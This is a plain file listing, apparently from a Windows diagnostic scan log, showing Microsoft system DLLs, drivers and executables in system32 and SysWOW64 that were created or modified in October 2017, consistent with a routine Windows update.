2017-10-10 20:23 - 2017-09-13 16:28 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 001460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 001163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000731648 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:13 - 004001512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-10-10 20:23 - 2017-09-13 16:13 - 003945704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-10-10 20:23 - 2017-09-13 16:10 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000830464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000428032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanmsm.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000392704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlansec.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000083968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanhlp.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanapi.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000554496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:05 - 000324608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nwifi.sys
2017-10-10 20:23 - 2017-09-13 16:00 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-10-10 20:23 - 2017-09-13 16:00 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-10-10 20:23 - 2017-09-13 16:00 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-10-10 20:23 - 2017-09-13 16:00 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-10-10 20:23 - 2017-09-13 15:57 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-10-10 20:23 - 2017-09-13 15:56 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-10-10 20:23 - 2017-09-13 15:53 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-10-10 20:23 - 2017-09-13 15:53 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-10-10 20:23 - 2017-09-13 15:53 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-10-10 20:23 - 2017-09-13 15:52 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-10-10 20:23 - 2017-09-13 15:52 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-10-10 20:23 - 2017-09-13 15:50 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-10-10 20:23 - 2017-09-13 15:47 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-10-10 20:23 - 2017-09-13 15:46 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-10-10 20:23 - 2017-09-13 15:46 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-10-10 20:23 - 2017-09-09 01:45 - 000395984 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-10-10 20:23 - 2017-09-09 00:47 - 000347344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-10-10 20:23 - 2017-09-08 16:34 - 001680616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-10-10 20:23 - 2017-09-08 16:30 - 002319872 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 002222080 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 002058240 _____ (Microsoft Corporation) C:\Windows\system32\Query.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000778240 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2017-10-10 20:23 - 2017-09-08 16:14 - 000591872 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2017-10-10 20:23 - 2017-09-08 16:13 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2017-10-10 20:23 - 2017-09-08 16:13 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2017-10-10 20:23 - 2017-09-08 16:10 - 001549824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2017-10-10 20:23 - 2017-09-08 16:10 - 001363968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Query.dll
2017-10-10 20:23 - 2017-09-08 16:10 - 000312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-10-10 20:23 - 2017-09-08 16:10 - 000109568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\t2embed.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 001400320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000197120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000104448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2017-10-10 20:23 - 2017-09-08 16:00 - 003222016 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-10-10 20:23 - 2017-09-08 16:00 - 000427520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2017-10-10 20:23 - 2017-09-08 16:00 - 000164352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2017-10-10 20:23 - 2017-09-08 15:59 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2017-10-10 20:23 - 2017-09-08 15:59 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msshooks.dll
2017-10-10 20:23 - 2017-09-08 15:20 - 000640512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswstr10.dll
2017-10-10 20:23 - 2017-09-08 15:20 - 000345088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msexcl40.dll
2017-10-10 20:23 - 2017-09-08 15:20 - 000008704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjint40.dll
2017-10-10 20:23 - 2017-09-07 22:38 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-10-10 20:23 - 2017-09-07 22:37 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-10-10 20:23 - 2017-09-07 22:19 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-10-10 20:23 - 2017-09-07 22:18 - 000417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-10-10 20:23 - 2017-09-07 22:18 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-10-10 20:23 - 2017-09-07 22:17 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-10-10 20:23 - 2017-09-07 22:17 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-10-10 20:23 - 2017-09-07 22:15 - 002902528 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-10-10 20:23 - 2017-09-07 22:08 - 025729536 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-10-10 20:23 - 2017-09-07 22:08 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-10-10 20:23 - 2017-09-07 22:07 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-10-10 20:23 - 2017-09-07 22:02 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-10-10 20:23 - 2017-09-07 22:01 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-10-10 20:23 - 2017-09-07 22:01 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-10-10 20:23 - 2017-09-07 22:01 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-10-10 20:23 - 2017-09-07 22:00 - 000817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-10-10 20:23 - 2017-09-07 21:52 - 000968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-10-10 20:23 - 2017-09-07 21:48 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-10-10 20:23 - 2017-09-07 21:40 - 005982208 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-10-10 20:23 - 2017-09-07 21:39 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-10-10 20:23 - 2017-09-07 21:38 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-10-10 20:23 - 2017-09-07 21:37 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-10-10 20:23 - 2017-09-07 21:33 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-10-10 20:23 - 2017-09-07 21:32 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-10-10 20:23 - 2017-09-07 21:29 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-10-10 20:23 - 2017-09-07 21:27 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-10-10 20:23 - 2017-09-07 21:13 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-10-10 20:23 - 2017-09-07 21:10 - 000807936 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-10-10 20:23 - 2017-09-07 21:10 - 000726528 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-10-10 20:23 - 2017-09-07 21:08 - 002134528 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-10-10 20:23 - 2017-09-07 21:08 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-10-10 20:23 - 2017-09-07 20:44 - 015262720 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-10-10 20:23 - 2017-09-07 20:40 - 003240960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-10-10 20:23 - 2017-09-07 20:27 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-10-10 20:23 - 2017-09-07 20:27 - 001548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-10-10 20:23 - 2017-09-07 20:17 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-10-10 20:23 - 2017-09-07 20:11 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-10-10 20:23 - 2017-09-07 20:10 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-10-10 20:23 - 2017-09-07 20:10 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-10-10 20:23 - 2017-09-07 20:10 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-10-10 20:23 - 2017-09-07 20:09 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-10-10 20:23 - 2017-09-07 20:04 - 020267008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-10-10 20:23 - 2017-09-07 20:03 - 002292736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-10-10 20:23 - 2017-09-07 20:03 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-10-10 20:23 - 2017-09-07 20:02 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-10-10 20:23 - 2017-09-07 19:59 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-10-10 20:23 - 2017-09-07 19:58 - 000663040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-10-10 20:23 - 2017-09-07 19:58 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-10-10 20:23 - 2017-09-07 19:58 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-10-10 20:23 - 2017-09-07 19:49 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-10-10 20:23 - 2017-09-07 19:44 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-10-10 20:23 - 2017-09-07 19:44 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-10-10 20:23 - 2017-09-07 19:43 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-10-10 20:23 - 2017-09-07 19:40 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-10-10 20:23 - 2017-09-07 19:39 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
